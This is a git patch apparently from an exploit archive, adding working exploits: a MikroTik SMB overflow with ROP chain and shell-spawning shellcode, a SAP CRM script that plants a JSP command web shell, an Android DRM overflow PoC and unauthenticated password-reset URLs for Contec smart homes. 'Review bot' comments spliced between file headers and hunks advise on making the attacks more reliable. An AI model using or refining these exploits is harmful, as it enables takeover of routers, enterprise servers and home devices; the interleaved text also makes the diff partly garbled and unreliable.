From b0fc7bfd43c9533acb3256ff45f38f82717f8394 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 17 Mar 2018 05:01:46 +0000
Subject: [PATCH] DB: 2018-03-17

6 changes to exploits/shellcodes

Android DRM Services - Buffer Overflow
MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow
SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution
Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution
Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
Contec Smart Home 4.15 - Unauthorized Password Reset
---
 exploits/android/dos/44291.cpp | 95 +++++++++++++++
 exploits/hardware/remote/44290.py | 90 +++++++++++++++
 exploits/hardware/webapps/44295.txt | 30 +++++
 exploits/windows/remote/44292.py | 141 +++++++++++++++++++++++
 exploits/windows/remote/44293.html | 165 ++++++++++++++++++++++++++
 exploits/windows/remote/44294.html | 172 ++++++++++++++++++++++++++++
 files_exploits.csv | 8 +-
 7 files changed, 700 insertions(+), 1 deletion(-)
 create mode 100644 exploits/android/dos/44291.cpp
 create mode 100755 exploits/hardware/remote/44290.py
 create mode 100644 exploits/hardware/webapps/44295.txt
 create mode 100755 exploits/windows/remote/44292.py
 create mode 100644 exploits/windows/remote/44293.html
 create mode 100644 exploits/windows/remote/44294.html

diff --git a/exploits/android/dos/44291.cpp b/exploits/android/dos/44291.cpp
new file mode 100644
index 000000000..e421e54cf
--- /dev/null
+++ b/exploits/android/dos/44291.cpp
@@ -0,0 +1,95 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+
+using namespace android;
+
+static sp getCrypto()
+{
+ sp sm = defaultServiceManager();
+ sp binder = sm->getService(String16("media.drm"));
+ sp service = interface_cast(binder);
+ if (service == NULL) {
+ fprintf(stderr, "Failed to retrieve 'media.drm' service.\n");
+ return NULL;
+ }
+ sp crypto = service->makeCrypto();
+ if (crypto == NULL) {
+ fprintf(stderr, "makeCrypto failed.\n");
+ return NULL;
+ }
+ return crypto;
+}
+
+static bool setClearKey(sp crypto)
+{
+ // A UUID which identifies the ClearKey DRM scheme.
+ const uint8_t clearkey_uuid[16] = {
+ 0x10, 0x77, 0xEF, 0xEC, 0xC0, 0xB2, 0x4D, 0x02,
+ 0xAC, 0xE3, 0x3C, 0x1E, 0x52, 0xE2, 0xFB, 0x4B
+ };
+ if (crypto->createPlugin(clearkey_uuid, NULL, 0) != OK) {
+ fprintf(stderr, "createPlugin failed.\n");
+ return false;
+ }
+ return true;
+}
+
+#define DATA_SIZE (0x2000)
+#define DEST_OFFSET (1)
+
+static void executeOverflow()
+{
+ // Get an interface to a remote CryptoHal object.
+ sp crypto = getCrypto();
+ if (crypto == NULL) {
+ return;
+ }
+
+ if (!setClearKey(crypto)) {
+ return;
+ }
+
+ // From here we're done with the preparations and go into the
+ // vulnerability PoC.
+
+ sp heap = new MemoryHeapBase(DATA_SIZE);
+ // This line is to merely show that we have full control over the data
+ // written in the overflow.
+ memset(heap->getBase(), 'A', DATA_SIZE);
+ sp sourceMemory = new MemoryBase(heap, 0, DATA_SIZE);
+ sp destMemory = new MemoryBase(heap, DATA_SIZE - DEST_OFFSET,
+ DEST_OFFSET);
+ int heapSeqNum = crypto->setHeap(heap);
+ if (heapSeqNum < 0) {
+ fprintf(stderr, "setHeap failed.\n");
+ return;
+ }
+
+ CryptoPlugin::Pattern pattern = { .mEncryptBlocks = 0, .mSkipBlocks = 1 };
+ ICrypto::SourceBuffer source = { .mSharedMemory = sourceMemory,
+ .mHeapSeqNum = heapSeqNum };
+ // mNumBytesOfClearData is the actual size of data to be copied.
+ CryptoPlugin::SubSample subSamples[] = { {
+ .mNumBytesOfClearData = DATA_SIZE, .mNumBytesOfEncryptedData = 0 } };
+ ICrypto::DestinationBuffer destination = {
+ .mType = ICrypto::kDestinationTypeSharedMemory, .mHandle = NULL,
+ .mSharedMemory = destMemory };
+
+ printf("decrypt result = %zd\n", crypto->decrypt(NULL, NULL,
+ CryptoPlugin::kMode_Unencrypted, pattern, source, 0, subSamples,
+ ARRAY_SIZE(subSamples), destination, NULL));
+}
+
+int main() {
+ executeOverflow();
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/hardware/remote/44290.py b/exploits/hardware/remote/44290.py
new file mode 100755
index 000000000..0a04b9cc3
--- /dev/null
+++ b/exploits/hardware/remote/44290.py
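Review bot: The PoC never states where the overflow lands or what a successful run looks like; a header comment above `executeOverflow()` would save the next reader working it out from `DEST_OFFSET`: `// decrypt() copies mNumBytesOfClearData (DATA_SIZE) bytes, but destMemory is only DEST_OFFSET (1) byte at the very end of the shared heap, so the copy runs past the mapping inside the process serving the media.drm binder call; a crash of that service, not of this client, is the expected outcome.` The `printf("decrypt result = %zd\n", ...)` line should likewise note that a non-zero status is presumably what a hit looks like, so it is not mistaken for a failed attempt. In this rendering the `#include` targets and the template arguments of every `sp` declaration are missing (angle-bracket text appears stripped), so the listing as shown does not compile and the upstream file should be consulted before use.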
@@ -0,0 +1,90 @@
+#!/usr/bin/env python
+
+import socket
+import struct
+import sys
+import telnetlib
+
+NETBIOS_SESSION_MESSAGE = "\x00"
+NETBIOS_SESSION_REQUEST = "\x81"
+NETBIOS_SESSION_FLAGS = "\x00"
+
+# trick from http://shell-storm.org/shellcode/files/shellcode-881.php
+# will place the socket file descriptor in eax
+find_sock_fd = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48"
+
+# dup stdin-stdout-stderr so we can reuse the existing connection
+dup_fds = "\x89\xc3\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9"
+
+# execve - cannot pass the 2nd arg as NULL or busybox will complain
+execve_bin_sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+# build shellcode
+shellcode = find_sock_fd + dup_fds + execve_bin_sh
+
+# rop to mprotect and make the heap executable
+# the heap base is not being subject to ASLR for whatever reason, so let's take advantage of it
+p = lambda x : struct.pack('I', x)
+
+rop = ""
+rop += p(0x0804c39d) # 0x0804c39d: pop ebx; pop ebp; ret;
+rop += p(0x08072000) # ebx -> heap base
+rop += p(0xffffffff) # ebp -> gibberish
+rop += p(0x080664f5) # 0x080664f5: pop ecx; adc al, 0xf7; ret;
+rop += p(0x14000) # ecx -> size for mprotect
+rop += p(0x08066f24) # 0x08066f24: pop edx; pop edi; pop ebp; ret;
+rop += p(0x00000007) # edx -> permissions for mprotect -> PROT_READ | PROT_WRITE | PROT_EXEC
+rop += p(0xffffffff) # edi -> gibberish
+rop += p(0xffffffff) # ebp -> gibberish
+rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret;
+rop += p(0x0000007d) # ebp -> mprotect system call
+rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;
+rop += p(0xffffe42e) # 0xffffe42e; int 0x80; pop ebp; pop edx; pop ecx; ret - from vdso - not affected by ASLR
+rop += p(0xffffffff) # ebp -> gibberish
+rop += p(0x0) # edx -> zeroed out
+rop += p(0x0) # ecx -> zeroed out
+rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret;
+rop += p(0x08075802) # ebp -> somewhere on the heap that will (always?) contain user controlled data
+rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;
+rop += p(0x0804e153) # jmp eax; - jump to our shellcode on the heap
+
+offset_to_regs = 83
+
+# we do not really care about the initial register values other than overwriting the saved ret address
+ebx = p(0x45454545)
+esi = p(0x45454545)
+edi = p(0x45454545)
+ebp = p(0x45454545)
+eip = p(0x0804886c) # 0x0804886c: ret;
+
+payload = "\xff" * offset_to_regs + ebx + esi + edi + ebp + eip + rop
+header = struct.pack("!ccH", NETBIOS_SESSION_REQUEST, NETBIOS_SESSION_FLAGS, len(payload))
+buf = header + payload
+
+def open_connection(ip):
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((ip, 139))
+ return s
+
+def store_payload(s):
+ print "[+] storing payload on the heap"
+ s.send((NETBIOS_SESSION_MESSAGE + "\x00\xeb\x02") * 4000 + "\x90" * 16 + shellcode)
+
+def crash_smb(s):
+ print "[+] getting code execution"
+ s.send(buf)
+
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ print "%s ip" % sys.argv[0]
+ sys.exit(1)
+
+ s = open_connection(sys.argv[1])
+ store_payload(s)
+
+ # the server closes the first connection, so we need to open another one
+ t = telnetlib.Telnet()
+ t.sock = open_connection(sys.argv[1])
+ crash_smb(t.sock)
+ print "[+] got shell?"
+ t.interact()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44295.txt b/exploits/hardware/webapps/44295.txt
new file mode 100644
index 000000000..0a16a0728
--- /dev/null
+++ b/exploits/hardware/webapps/44295.txt
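Review bot: `store_payload()` and `crash_smb()` use `s.send()`, which may write only part of the buffer; the spray in `store_payload()` is roughly 16 KB, and a short write leaves fewer copies of the shellcode on the heap than the fixed `0x08075802` landing address in the ROP chain assumes. Change both calls to `s.sendall(...)`. Every gadget and the `0x08072000` heap base are hard-coded for one x86 build that the script nowhere records; a comment above `rop = ""` such as `# gadget addresses and heap base are specific to the smb binary this was developed against; confirm against the target image before use` would stop it being run as if it were version-independent. Nothing checks that the second connection is still open before `t.interact()`, so `[+] got shell?` is printed even when the service simply crashed.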
@@ -0,0 +1,30 @@
+# Title : Contec smart home 4.15 Unauthorized Password Reset
+# Shodan Dork : "content/smarthome.php"
+# Vendor Homepage : http://contec.co.il
+# Tested on : Google Chrome
+# Tested version : 4.15
+# Date : 2018-03-14
+# Author : Z3ro0ne
+# Contact : saadousfar59@gmail.com
+# Facebook Page : https://www.facebook.com/Z3ro0ne
+
+# Vulnerability description :
+the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)
+
+
+# Exploit
+
+ To Reset Admin password
+ http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
+
+ To Create a new user
+ http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
+
+ To edit a user
+ http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
+
+ To Delete a user
+ http://Ipaddress:port/content/delete_user.php?user_name=USER
+
+ Users list
+ http://Ipaddress:port/content/user.php
\ No newline at end of file
diff --git a/exploits/windows/remote/44292.py b/exploits/windows/remote/44292.py
new file mode 100755
index 000000000..2091db710
--- /dev/null
+++ b/exploits/windows/remote/44292.py
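Review bot: The advisory lists the requests but gives no operational caveat: the new password is sent in the query string, so it lands in browser history, proxy logs and the device's own web server log, and the first example overwrites the `ADMIN` credential, which locks the legitimate owner out of the doors and air conditioning the device controls. A line after `# Exploit` such as `# Note: these requests change live credentials; for verification create a throwaway user with new_user.php instead of resetting ADMIN` would make that explicit. The write-up also does not say whether a vendor fix or CVE exists; if none was found, stating that avoids readers assuming only 4.15 is affected.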
@@ -0,0 +1,141 @@
+#!/usr/bin/env python
+import argparse
+import urllib
+
+import requests, random
+from bs4 import BeautifulSoup
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+help_desc = '''
+PoC of Remote Command Execution via Log injection on SAP CRM
+-- ERPScan
+
+python crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true
+'''
+baner = '''
+ _______ _______ _______ _______ _______ _______ _
+( ____ \( ____ )( ____ )( ____ \( ____ \( ___ )( ( /|
+| ( \/| ( )|| ( )|| ( \/| ( \/| ( ) || \ ( |
+| (__ | (____)|| (____)|| (_____ | | | (___) || \ | |
+| __) | __)| _____)(_____ )| | | ___ || (\ \) |
+| ( | (\ ( | ( ) || | | ( ) || | \ |
+| (____/\| ) \ \__| ) /\____) || (____/\| ) ( || ) \ |
+(_______/|/ \__/|/ \_______)(_______/|/ \||/ )_)
+Vahagn @vah_13 Vardanian
+Bob @NewFranny
+CVE-2018-2380
+
+'''
+
+
+def start(ip, port, username, password, sid, ssl):
+ if ssl == None:
+ base_scheme = 'http'
+ else:
+ base_scheme = 'https'
+ req_adapter = requests.session()
+ _server_ip_port = "{0}:{1}".format(ip, port)
+ _username = username
+ admin_password = password
+ _headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+ "Referer": "{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1".format(
+ base_scheme,_server_ip_port)
+ }
+
+ # shell name
+ _shell_name = "ERPScan_shell_{0}".format(random.randint(1337, 31337))
+
+ # shell_code
+ shell_code = '''
+ <%@ page import="java.util.*,java.io.*"%>
+ <%
+ if (request.getParameter("cmd") != null) {
+ out.println("Command: " + request.getParameter("cmd") + "");
+ Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+ OutputStream os = p.getOutputStream();
+ InputStream in = p.getInputStream();
+ DataInputStream dis = new DataInputStream(in);
+ String disr = dis.readLine();
+ while ( disr != null ) {
+ out.println(disr);
+ disr = dis.readLine();
+ }
+ }
+ %>
+ '''
+ # urls variables
+ _irj_portal = "{0}://{1}/irj/portal".format(base_scheme,_server_ip_port)
+ _b2b_admin_url = "{0}://{1}/b2b/admin/index.jsp".format(base_scheme,_server_ip_port)
+ _url_of_log_path = "{0}://{1}/b2b/admin/logging.jsp".format(base_scheme,_server_ip_port)
+ _url_write_shell_to_log_file = "{0}://{1}/b2b/init.do?\"%22]{2}[%22\"".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))
+
+ # data variable
+ _post_data_restore_log_path = {"selConfigName": "com.sap.isa",
+ "selSeverity": "0",
+ "selDest": "./default_log_name.log",
+ "selLimit": "10485760",
+ "selCount": "20",
+ "selFormatterType": "ListFormat",
+ "selPattern": "none",
+ "mode": "save",
+ "selLocationIdx": "1"}
+ _post_data_to_change_log_path = {"selConfigName": "com.sap.isa",
+ "selSeverity": "0",
+ "selDest": "C:\\usr\\sap\\{0}\\J00\\j2ee\\cluster\\apps\\sap.com\\com.sap.engine.docs.examples\\servlet_jsp\\_default\\root\\{1}.jsp".format(sid, _shell_name),
+ "selLimit": "10485760",
+ "selCount": "20",
+ "selFormatterType": "ListFormat",
+ "selPattern": "none",
+ "mode": "save",
+ "selLocationIdx": "1"}
+
+ print("{0} \n[!] Try to get RCE using log injection ".format(baner))
+
+ print("[!] Get j_salt token for requests")
+ res = requests.get(_irj_portal, headers=_headers, verify=False)
+ soup = BeautifulSoup(res.text, "html.parser")
+ e = soup.find("input", {"name": "j_salt"})
+ __j_salt = e['value']
+
+ print("[!] Login to the SAP portal")
+ req_adapter.post(_b2b_admin_url,
+ headers=_headers,
+ data={"login_submit": "on", "login_do_redirect": "1", "j_salt": __j_salt,
+ "j_username": "{0}".format(_username), "j_password": "{0}".format(admin_password),
+ "uidPasswordLogon": "Log On"}, verify=False)
+
+ print("[!] Change log path ")
+ req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)
+
+ print("[!] Upload \"Runtime.getRuntime().exec(request.getParameter(\"cmd\")) \" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig".format(base_scheme,_server_ip_port, _shell_name))
+ req_adapter.get(_url_write_shell_to_log_file, headers=_headers)
+
+ print("[!] Restore logs path to ./default_log_name.log")
+ req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)
+
+ print("[!] Enjoy!")
+
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)
+ parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')
+ parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')
+
+ parser.add_argument('-u', '--username', help='SAP CRM administrator')
+ parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')
+
+ parser.add_argument('-s', '--SID', help='SAP SID')
+ parser.add_argument('-S', '--ssl', help='Use ssl connection')
+
+ args = parser.parse_args()
+ args_dict = vars(args)
+
+ host = args_dict['host']
+ port = args_dict['port']
+ username = args_dict['username']
+ password = args_dict['password']
+ sid = args_dict['SID']
+ ssl = args.ssl
+ start(host, port, username, password, sid, ssl)
\ No newline at end of file
diff --git a/exploits/windows/remote/44293.html b/exploits/windows/remote/44293.html
new file mode 100644
index 000000000..d0953a7b4
--- /dev/null
+++ b/exploits/windows/remote/44293.html
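Review bot: Only the first `requests.get(_irj_portal, ...)` and the login POST pass `verify=False`; the `req_adapter.post`/`req_adapter.get` calls that change the log path, write the shell and restore the path do not, so with `--ssl` against a self-signed SAP certificate they raise `SSLError` after the login has already been performed. Set it once on the session, `req_adapter.verify = False`, right after `req_adapter = requests.session()`. The salt is also fetched with a bare `requests.get` outside `req_adapter`, so if `j_salt` is tied to the session cookie the login presumably fails; fetch it through the session instead. The restore step writes a fixed `./default_log_name.log` rather than whatever `selDest` held before, so on an engagement the current value should be read from `logging.jsp` before it is changed, and no response status is checked, so `[!] Enjoy!` prints even when every step failed.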
@@ -0,0 +1,165 @@
+
+
+
+
+CVE-2016-2819 and ASM.JS JIT-Spray
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/remote/44294.html b/exploits/windows/remote/44294.html
new file mode 100644
index 000000000..299b32592
--- /dev/null
+++ b/exploits/windows/remote/44294.html
@@ -0,0 +1,172 @@
+
+
+
+
+CVE-2016-1960 and ASM.JS JIT-Spray
+
+
+
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 955f27f3e..30dfae0be 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5900,6 +5900,7 @@ id,file,description,date,author,type,platform,port
 44265,exploits/linux/dos/44265.py,"Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API",2018-03-08,649,dos,linux,11211
 44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android,
 44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows,
+44291,exploits/android/dos/44291.cpp,"Android DRM Services - Buffer Overflow",2018-03-15,"Tamir Zahavi-Brunner",dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16324,6 +16325,10 @@ id,file,description,date,author,type,platform,port
 44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
 44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
 44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
+44290,exploits/hardware/remote/44290.py,"MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow",2018-03-15,CoreLabs,remote,hardware,
+44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows,
+44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
+44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39001,4 +39006,5 @@ id,file,description,date,author,type,platform,port
 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,
 44286,exploits/php/webapps/44286.txt,"Tuleap 9.17.99.189 - Blind SQL Injection",2018-03-13,"Cristiano Maruti",webapps,php,
 44288,exploits/php/webapps/44288.txt,"WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting",2018-03-15,"Stefan Broeder",webapps,php,80
-44289,exploits/java/webapps/44289.java,"Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution",2018-03-15,"Antonio Francesco Sardella",webapps,java,
+44289,exploits/java/webapps/44289.java,"Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution",2018-03-15,"Antonio Francesco Sardella",webapps,java,
+44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware,